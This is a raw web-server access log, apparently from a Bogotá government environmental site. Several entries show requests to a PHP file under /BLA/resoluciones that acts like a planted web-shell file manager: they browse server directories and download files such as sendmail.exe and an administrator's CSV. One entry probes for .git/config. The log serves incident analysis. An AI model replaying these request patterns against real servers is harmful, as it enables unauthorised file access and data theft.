186.102.76.76 - - [16/Jun/2024:07:30:42 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18QKDC70w7QxEoiRg0jTH3/jMh7zSqiPS30tJlF8lV8v2F8kBJ86Fq3nZrcu7MLG3f4xEOWQBmEhBmv3f/cR3XjXaAnYfjhAooewo/qznDzu0LNXPdM/44qifXmhX8PoCZaH3/0Q8wVER+2WHkHHp+/E5pDI0Orukt1kOLh4Ni6LC8KpcrqI65CwGzDv/s3EvP9igg9LCRaGhWSqtfrYtrECRZ5LHLIq2Uao78cUAfUDeW66JukfUMRUboZ6fQcSQRS86OOh3pC8Etpb2o131phKdHm0pNDg8K2sy32azxfsJ6vsmeXn4Wo3ZOQ2YcO4ZFF0OagFBpMUT98/+3Tt1qwuclyiP2+VJhv6hePyCwBXf/ohbNG5UQJaVPWnwZ2AluJnEePETbtL3EQ64/HKMSQpIkjSzjOubkKUPWs+t3HZTucalSPrmt5BgAAlagP8h1vqVuzLFoHpFXhBnbWfbtLoR29j1vQlYKHnDSx1Wt85yeVSspbERhd2E5OhT+TGNLPVj/QXqOTiYgqd/1gKCo1dLfHKjNAh04jNTviznpDAP1WPLk9gRxQ7BQ9D1+h8kaWtzaloGiDnJJxrU7QdWbsz0o9idL1yxeWqDiYDjWBDpvlWzv9T1mP+1/fuVy/83OFMS2WRL00O0Om8/buLr+Cb1TdsorL5JVHjSIcUSoLAswnlHS7Nvbuzhbydm7MiIl0UHXhjQky7iZqg6SL14MEqPoWAb5Oa16ArXU6rSUtOQSYlUCPA4YkURWN5gQ8wSEkD2OcPEbDAuAgk5c14E2M2mUu0/wxVoqvxGkzwQJ5BFOQyTaECUpzv0ABRkRXmfYBYB27CV8pPj9VOAYvNKhp9ZmfwTOaNE2V7GPWYAj+bNE4BTkZiuOWrgxpbqjfO1kntz5eduqQSZXaNvRnO3Y6GJ8Xk07Nm3T95PUBBk+yK3samUkXicIvMNTAqjB3Ico2awat0UBTClpv0Fy9Z/1+FUE8uphqOpsepPQe0UmZ2OBlnRgcqhb8kzPuR/xiW+VEFjUkhyV/4biGu6Jl9+N/bbTjlF1tyGP6TinVmbUkStXKyaU8ujUbY5TXPcDdWeISU2vaXkxd0P0vKwavd/7q8H3BecdCAD8SIaVdXQbQKzeZr4lyKLUl3JMouLST61fyB/cL4AWoeoZByyKmVxqIidB89QlNfVPfwGymp9/KJlv/K8BFW0YYFUjX+y1B8mGMm1A66rwlnwgzSWXQs/QGrUCVB54cjN8xN2VmUyMnImpU2cZmgIYXfQQ5crzizFnHF7WQpYN5MnQrtnIbeUQmrPNYO0bDHx8OBX+OGBtwmQgh5QCiSLQB80grJO1SCU/BZLqyfC3rvlr7Fv6KtE6N6TulxzmrxecL8nltK7dIO47SFIdxTDrDKirrIiddbSKxqO66oGaE0ebMNZL9ZSu8VhpnVB3du4qw27qgh9DlryoN/zYSaGj6cKVV9jKnQlSrtCzykqSZ74oh49XELAOJzlAo5yDyhjKimx/U2TmZTo5tJFE/oQ182M0MQHXIBk0oePXbijbg6RezBQH1mv+rMC3xh0XKYIKnP1aR+z+SYbQT//112AGK5hkgpyTGbhbcygjdFxbw92adl2BVlHwA+FEdZEHmbGJX2JPrTAz/0Ve+EWABpMlbPIeZmfvgLAN3kC0JbvqIs2dbLF6dURB030OzePm2l7l0CZDLhCs2DYAqX3yBcLuJNST9feymhKcrbbpkF0PumF0j4/5iQWh6dImqnAw7XrU=&u=U2FsdGVkX1+7tDhvdU6HAsRwMUS+MBnfAt+bPKcLNfI=&y=U2FsdGVkX1/qg6KG4GGZmX6ZtS5dGSkLFF2UQd1df23XKra8GW9J6zpap6NS4yu8 HTTP/1.1" 200 3347
186.102.76.76 - - [16/Jun/2024:07:30:42 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX197TiHU+w/K4+NNfm5ucgn9/uGy5XyoSzkYceW7j1lCmEockBrSQzDL2Vddm8RtjoLIuHwlz0SH6NpnkpxuUuV4a/HEvqoP47tkmaUHngo6Q/+D6y3jVYrdI8xpED3QhLLTmMNGU3jcimNKg/wyVuzv9ZtEsPPwKX75dMLWTbRYaaOKbRNDJHGmjHmMwLn9olLCMdIunDydFXB4N7LkJh63bZ3kfy6LV+EiN3LPSFNoC87EVzZ4CB4Nn6X2nNjvht5CU+dfMZGRzFuWmqCnk2EfY1RL92XKNMgs5Ur9P4weJqyfHgbUG8mHkZnZvxyB6Sog7JE9h+H9nK+zHggdUNNY2hZhIXb+Eszwtzem7gqDFhAtZjY36NWRquctmv90o1INbRuBmiy8tILk+eqYaH9X7fIt24DxftNWrkeLHv037hyOYtC+p7FcjP267nlFFOcGZpcHRjqrUEhjMOfT00wcwuJvq1jxjYB05WUN/6Lxwd7DZBjAqy1Cm1nFhZzHkj16cwxEGPfZFOCnAMNBof91+WOpPwG2QHD9UDH8jmgq5Yq6kyJ2dCn6sqCCf6wASMiQzyrmVbdFauiZnqmqFHj4JkH7R+k+WHK9+kXX7bxLDNMLworOYm0Xbpt2lRX1vaRoYGeB1Zf1PzJ4eBwjbFCMnc81+INIbUDuVI8Dqxx6IcyBeU4qH/YE6F6D1uOJ/4TxYMdwAs4POsufLUiUzcGerZ/xm4AeFYrmoprPDixDkSV6HzKY3FM8&u=U2FsdGVkX1+7tDhvdU6HAsRwMUS+MBnfAt+bPKcLNfI=&y=U2FsdGVkX1/qg6KG4GGZmX6ZtS5dGSkLFF2UQd1df23XKra8GW9J6zpap6NS4yu8 HTTP/1.1" 200 208
186.102.76.76 - - [16/Jun/2024:07:30:43 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18k61v7U1n+rxgcuBf8xzIozSIibH8z2ITf8zaSCbOtwUZBs1kYYqFf HTTP/1.1" 200 30244
47.128.116.240 - - [16/Jun/2024:07:30:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300%5C&f=00001271.tif&white=1 HTTP/1.1" 200 205844
172.22.2.4 - - [16/Jun/2024:07:29:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [16/Jun/2024:07:31:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:31:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:32:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [16/Jun/2024:07:33:07 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202023/0388.pdf HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:07:33:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:33:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:34:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.112.195 - - [16/Jun/2024:07:35:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4238.pdf&ft=img&white=1 HTTP/1.1" 200 409359
201.245.192.253 - - [16/Jun/2024:07:35:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:34:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:36:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:36:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:35:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [16/Jun/2024:07:37:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:36:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36381
201.245.192.253 - - [16/Jun/2024:07:37:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34349
201.245.192.253 - - [16/Jun/2024:07:38:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:38:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34200
47.128.52.41 - - [16/Jun/2024:07:39:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5262.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [16/Jun/2024:07:39:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:39:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34349
69.63.184.1 - - [16/Jun/2024:07:39:54 -0500] "GET /bogota-tendra-la-primera-planta-de-termovalorizacion-de-colombia-la-cual-convertira-los-residuos-en-energia-para-la-ciudad.html HTTP/1.1" 200 883
69.63.184.9 - - [16/Jun/2024:07:39:54 -0500] "GET /bogota-tendra-la-primera-planta-de-termovalorizacion-de-colombia-la-cual-convertira-los-residuos-en-energia-para-la-ciudad.html HTTP/1.1" 200 883
69.171.251.4 - - [16/Jun/2024:07:39:55 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
201.245.192.253 - - [16/Jun/2024:07:40:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:07:40:40 -0500] "GET /BLA/resoluciones/AUTOS%202007/1884.pdf HTTP/1.1" 200 151562
216.244.66.195 - - [16/Jun/2024:07:40:45 -0500] "GET /BLA/resoluciones/AUTOS%202007/1973.pdf HTTP/1.1" 200 31988
216.244.66.195 - - [16/Jun/2024:07:40:49 -0500] "GET /BLA/resoluciones/AUTOS%202010/0345.pdf HTTP/1.1" 200 341960
201.245.192.253 - - [16/Jun/2024:07:41:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:41:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:07:41:29 -0500] "GET /BLA/resoluciones/AUTOS%202010/2385.pdf HTTP/1.1" 200 317494
172.22.2.4 - - [16/Jun/2024:07:40:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [16/Jun/2024:07:42:02 -0500] "GET /BLA/resoluciones/AUTOS%202010/3849.pdf HTTP/1.1" 200 128582
201.245.192.253 - - [16/Jun/2024:07:42:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:07:42:33 -0500] "GET /BLA/resoluciones/AUTOS%202010/4361.pdf HTTP/1.1" 200 1837343
172.22.2.4 - - [16/Jun/2024:07:41:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
216.244.66.195 - - [16/Jun/2024:07:43:23 -0500] "GET /BLA/resoluciones/AUTOS%202010/4414.pdf HTTP/1.1" 200 140617
201.245.192.253 - - [16/Jun/2024:07:43:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:43:28 -0500] "HEAD / HTTP/1.1" 200 -
47.128.52.95 - - [16/Jun/2024:07:43:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3519.pdf&ft=img&white=1 HTTP/1.1" 200 20239
216.244.66.195 - - [16/Jun/2024:07:43:53 -0500] "GET /BLA/resoluciones/AUTOS%202010/4415.pdf HTTP/1.1" 200 142551
216.244.66.195 - - [16/Jun/2024:07:44:22 -0500] "GET /BLA/resoluciones/AUTOS%202010/4427.pdf HTTP/1.1" 200 1160288
201.245.192.253 - - [16/Jun/2024:07:44:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.235 - - [16/Jun/2024:07:44:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0973.pdf HTTP/1.1" 200 461092
216.244.66.195 - - [16/Jun/2024:07:44:55 -0500] "GET /BLA/resoluciones/AUTOS%202010/4583.pdf HTTP/1.1" 200 172691
40.77.167.20 - - [16/Jun/2024:07:45:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0538.pdf HTTP/1.1" 304 -
216.244.66.195 - - [16/Jun/2024:07:45:23 -0500] "GET /BLA/resoluciones/AUTOS%202010/5219.pdf HTTP/1.1" 200 323366
201.245.192.253 - - [16/Jun/2024:07:45:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:07:45:49 -0500] "GET /BLA/resoluciones/AUTOS%202010/5246.pdf HTTP/1.1" 200 248769
216.244.66.195 - - [16/Jun/2024:07:46:14 -0500] "GET /BLA/resoluciones/AUTOS%202010/5408.pdf HTTP/1.1" 200 185023
201.245.192.253 - - [16/Jun/2024:07:46:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [16/Jun/2024:07:46:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/5574.pdf HTTP/1.1" 200 631601
201.245.192.253 - - [16/Jun/2024:07:47:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:47:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:47:39 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000002%20DEL%2020%20DE%20FEBRERO%20DEL%202023.pdf HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:07:46:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
172.22.2.4 - - [16/Jun/2024:07:46:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.33.109 - - [16/Jun/2024:07:47:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5352.pdf&ft=img&white=1 HTTP/1.1" 200 823055
201.245.192.253 - - [16/Jun/2024:07:48:21 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:48:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:48:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:07:46:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [16/Jun/2024:07:49:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:50:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:50:43 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2005%20del%2013%20de%20Junio%20de%202017.pdf HTTP/1.1" 304 -
66.249.66.19 - - [16/Jun/2024:07:50:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 304 -
40.77.167.76 - - [16/Jun/2024:07:50:53 -0500] "GET /cumpleanos-485-de-bogota-inscribete-a-las-jornadas-de-monitoreo-a-la-biodiversidad.html HTTP/1.1" 200 847
52.167.144.207 - - [16/Jun/2024:07:51:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [16/Jun/2024:07:51:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.185 - - [16/Jun/2024:07:51:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6045.pdf&ft=img&white=1 HTTP/1.1" 200 360207
201.245.192.253 - - [16/Jun/2024:07:52:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:07:53:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:53:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:53:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:07:51:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:07:53:43 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:07:52:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:07:54:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [16/Jun/2024:07:54:50 -0500] "GET /BLA/resoluciones/AUTOS%202023/0318.pdf HTTP/1.1" 200 379154
201.245.192.253 - - [16/Jun/2024:07:55:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.203 - - [16/Jun/2024:07:55:58 -0500] "GET /Publicaciones/2024EE103955.pdf HTTP/1.1" 404 228
216.244.66.195 - - [16/Jun/2024:07:56:05 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:07:56:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.111 - - [16/Jun/2024:07:56:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CUsers%5CAdministrator%5CDownloads&f=resoluciones%287%29.csv&ft=edit HTTP/1.1" 200 1679062
201.245.192.253 - - [16/Jun/2024:07:57:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:07:58:05 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:07:58:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:07:58:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:07:58:28 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [16/Jun/2024:07:58:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/0374.pdf HTTP/1.1" 200 392051
66.249.66.20 - - [16/Jun/2024:07:58:59 -0500] "GET /Publicaciones/2024EE84192.pdf HTTP/1.1" 404 227
172.22.2.4 - - [16/Jun/2024:07:57:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:07:59:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [16/Jun/2024:07:59:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1905.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2024:07:58:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
47.128.45.122 - - [16/Jun/2024:08:00:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5992.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [16/Jun/2024:08:00:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:00:45 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [16/Jun/2024:08:00:45 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%205%20del%2029%20de%20Agosto%20de%202011.pdf HTTP/1.1" 200 444404
173.252.127.6 - - [16/Jun/2024:08:01:01 -0500] "GET /resiliencia-al-cambio-climatico-la-gran-meta-del-distrito-y-la-secretaria-de-ambiente-en-el-plan-de-desarrollo.html HTTP/1.1" 200 1340
201.245.192.253 - - [16/Jun/2024:08:01:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:08:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202023/1151.pdf HTTP/1.1" 200 703576
201.245.192.253 - - [16/Jun/2024:08:02:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
20.27.20.23 - - [16/Jun/2024:08:02:51 -0500] "GET /Publicaciones/2023EE239880.pdf HTTP/1.1" 404 228
186.102.76.76 - - [16/Jun/2024:08:02:55 -0500] "-" 408 -
201.245.192.253 - - [16/Jun/2024:08:03:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:08:03:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:03:28 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:08:04:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.123.15 - - [16/Jun/2024:08:04:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5234.pdf&ft=img&white=1 HTTP/1.1" 200 401167
172.22.2.4 - - [16/Jun/2024:08:03:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:08:05:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.90.251.233 - - [16/Jun/2024:08:05:46 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [16/Jun/2024:08:04:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
66.249.66.20 - - [16/Jun/2024:08:06:05 -0500] "GET /Publicaciones/2024EE32021.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:08:06:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.7 - - [16/Jun/2024:08:06:24 -0500] "GET /la-feria-de-servicios-ambientales-llega-a-la-localidad-rafael-uribe-uribe.html HTTP/1.1" 200 866
201.245.192.253 - - [16/Jun/2024:08:07:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:08:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:08:08:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:08:28 -0500] "HEAD / HTTP/1.1" 200 -
47.128.23.88 - - [16/Jun/2024:08:08:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Csendmail%5C&f=sendmail.exe&ft=download&white=1 HTTP/1.1" 200 929443
201.245.192.253 - - [16/Jun/2024:08:09:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:10:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:09:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [16/Jun/2024:08:11:06 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/5556.pdf HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:08:11:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:10:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [16/Jun/2024:08:12:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.224.128.43 - - [16/Jun/2024:08:12:39 -0500] "GET / HTTP/1.1" 200 319
47.128.49.79 - - [16/Jun/2024:08:12:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=heartbeat.js&ft=download&white=1 HTTP/1.1" 200 20089
201.245.192.253 - - [16/Jun/2024:08:13:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:08:13:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:13:28 -0500] "HEAD / HTTP/1.1" 200 -
186.102.76.76 - - [16/Jun/2024:08:13:52 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX188SO0yZEV5AtwrZr5GQq9mQGGuxKHYIa2q0HWc0pYhGi2oZAzpETya&y=U2FsdGVkX18nQG1cLonrXB9zex3kPPG7AIHNsgW1ywUo11k58t4/68eoCiWp3Jo1 HTTP/1.1" 200 30
186.102.76.76 - - [16/Jun/2024:08:13:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX194vwBk+BQ4sDIGzFvCulfhmZE5UyxrciQOrU9E+Us1j7w6RdUvazPq9O5zjHZ6J7wfs7/t4QvIBk2S7gp/vYPIj91p/n3aYxo=&u=U2FsdGVkX1+jPdBlFBGpI3QSFD8fIbN6eZZ3nvS2y8U=&y=U2FsdGVkX18nQG1cLonrXB9zex3kPPG7AIHNsgW1ywUo11k58t4/68eoCiWp3Jo1 HTTP/1.1" 200 97
186.102.76.76 - - [16/Jun/2024:08:13:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Q3kRu+vaqg+JptSov41pybfzUoJjV5I8TqnjtnjC7GZluwHjrhgSvLoVRs+rxPzMgqe0hOvfFeQagVteWIl7K5rsXOBQ2xnr0TjA3oRTgg74PR1idlWoGLbNJifuDPMjm44DFV+fN1Kt9Ao+FEmaNMTXGzVqM6yRz79Kw57Pv9zAbJDvpUlkTIoh5fso7HVxwFyKW6xXK4O171wdFofKVbjagki7hXq0QBwNYUKwNJz7K6L4lmkaJZmpEz+x2aHBPsHytkD6eKT8/Rn3fe9pi0QSxzWgqEoTiPY6m+fylNg3gW/fctMmP6m+blirlRcc+gu8q3o/3VnbDg8jNL/EGfnakDQfOMbPX15XeHR2J62xeFxEPNlnoNvKAqk7sh7n534Ca6KVpLGAbzVTvl1EjK5uZYqZa3N780qo9s+wbaYrRhmwwED965f/YxC5wXuzVqbUJI9FNLMKSpkL8AAesJZR4GV2lGRzHqa3iwlAnkayhqv02sOjliwNHVoel5ueUcH+L6Ofe/a8UiVsDiVCIt3df9gz9KdMpjU/mLxyBOaWjfAifexS0ZNHrqMAUAccoSHicoxl4WCKRkoChfXaFrK70UCO14WaexdsqkO1r8QrJPF7ZKIesJJjwj/T4UG8MFdBjH1V/XQmov1F8wmYSh6mMBgsvyr1z8srGKhQ7JilS9fb5yRnIcxA2t4M6O/BeMx7GYkW2RcMfZ3zqqAMpWfu12gzVgcx+BixEmJYiRAqKVN5iWUuNIx2jkTmxYj6I8KZJNxfZlqMppbyQoAiKiexzDiu08qCsn33YzhdkemkcnF/Ol2YKgcA2hJTVi1Mz2P3llrZvaHHvS9sdPeCeQMyLvZadFd3vh8+4/vest8hwoC3DfGKK43k6iBt5d01qeLXsGDk3gxjbuIP0IvSD0FuFfdbLv8TFyaKmhnc+CWROyXd5Oe+K73/T7JuYZlJneKWC0uc+rxZCfDUa8rIWyDVQdEnb/jTZQUMhap4mcjcrsPh4v/b/abo/Kl2xTXDNVekJHLCknQUK8umjcRDR2XjfBxrFyESMW5cGwcdRFIX2RqwnEZM6h5UPY6zXFavyORpt0qVGdK3EOIVljAnl1krVdsf3H9GChvL/xHYjrPt88kBjQTrO/cnycWcYAVurgQhRoUfnc/IeBxfmlo4VJutTAdJYfap3pA/bJmiwpIwkn7K5zkMpMqQDXPwUMc7qgJLT9fpVVPZNrSdAMWZ/zUPw/lftA7FSGrQD31vostW38G/hT4dwj8Be6z1hTZS9ZIrO5ji958qEuMzKYnqt76PwtTvcoTzgsyewkiWoDWWstwrFP